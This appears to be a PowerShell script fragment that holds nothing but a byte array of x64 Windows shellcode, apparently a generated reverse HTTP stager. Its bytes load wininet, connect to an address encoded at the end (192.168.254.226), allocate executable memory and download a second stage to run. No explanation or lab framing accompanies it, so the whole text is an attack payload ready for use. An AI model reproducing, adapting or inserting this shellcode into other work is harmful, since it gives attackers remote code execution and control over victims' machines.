[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x0,0x0,0x0
$buf += 0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2
$buf += 0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48
$buf += 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7
$buf += 0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c
$buf += 0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41
$buf += 0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52
$buf += 0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78
$buf += 0x18,0xb,0x2,0x75,0x72,0x8b,0x80,0x88,0x0,0x0
$buf += 0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50
$buf += 0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0
$buf += 0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48
$buf += 0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41
$buf += 0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1
$buf += 0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8
$buf += 0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41
$buf += 0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0
$buf += 0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41
$buf += 0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a
$buf += 0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41
$buf += 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff
$buf += 0x5d,0x6a,0x0,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e
$buf += 0x65,0x74,0x0,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89
$buf += 0xf1,0x49,0xba,0x4c,0x77,0x26,0x7,0x0,0x0,0x0
$buf += 0x0,0xff,0xd5,0x6a,0x0,0x6a,0x0,0x48,0x89,0xe1
$buf += 0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41
$buf += 0x50,0x41,0x50,0x49,0xba,0x3a,0x56,0x79,0xa7,0x0
$buf += 0x0,0x0,0x0,0xff,0xd5,0xe9,0x9e,0x0,0x0,0x0
$buf += 0x5a,0x48,0x89,0xc1,0x49,0xb8,0xfb,0x20,0x0,0x0
$buf += 0x0,0x0,0x0,0x0,0x4d,0x31,0xc9,0x41,0x51,0x41
$buf += 0x51,0x6a,0x3,0x41,0x51,0x49,0xba,0x57,0x89,0x9f
$buf += 0xc6,0x0,0x0,0x0,0x0,0xff,0xd5,0xeb,0x7c,0x48
$buf += 0x89,0xc1,0x48,0x31,0xd2,0x41,0x58,0x4d,0x31,0xc9
$buf += 0x52,0x68,0x0,0x32,0xa0,0x84,0x52,0x52,0x49,0xba
$buf += 0xeb,0x55,0x2e,0x3b,0x0,0x0,0x0,0x0,0xff,0xd5
$buf += 0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x48
$buf += 0xba,0x1f,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x6a
$buf += 0x0,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x49
$buf += 0xb9,0x4,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x49
$buf += 0xba,0x75,0x46,0x9e,0x86,0x0,0x0,0x0,0x0,0xff
$buf += 0xd5,0x48,0x89,0xf1,0x48,0x31,0xd2,0x4d,0x31,0xc0
$buf += 0x4d,0x31,0xc9,0x52,0x52,0x49,0xba,0x2d,0x6,0x18
$buf += 0x7b,0x0,0x0,0x0,0x0,0xff,0xd5,0x85,0xc0,0x75
$buf += 0x24,0x48,0xff,0xcf,0x74,0x13,0xeb,0xb1,0xe9,0x81
$buf += 0x0,0x0,0x0,0xe8,0x7f,0xff,0xff,0xff,0x2f,0x4d
$buf += 0x72,0x4b,0x52,0x0,0x0,0x49,0xbe,0xf0,0xb5,0xa2
$buf += 0x56,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x31,0xc9
$buf += 0x48,0xba,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0
$buf += 0x49,0xb8,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0
$buf += 0x49,0xb9,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0
$buf += 0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0
$buf += 0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48
$buf += 0x89,0xf1,0x48,0x89,0xda,0x49,0xb8,0x0,0x20,0x0
$buf += 0x0,0x0,0x0,0x0,0x0,0x49,0x89,0xf9,0x49,0xba
$buf += 0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5
$buf += 0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0x99,0x48,0x8b
$buf += 0x7,0x48,0x1,0xc3,0x48,0x85,0xc0,0x75,0xce,0x58
$buf += 0x58,0xc3,0xe8,0xd7,0xfe,0xff,0xff,0x31,0x39,0x32
$buf += 0x2e,0x31,0x36,0x38,0x2e,0x32,0x35,0x34,0x2e,0x32
$buf += 0x32,0x36,0x0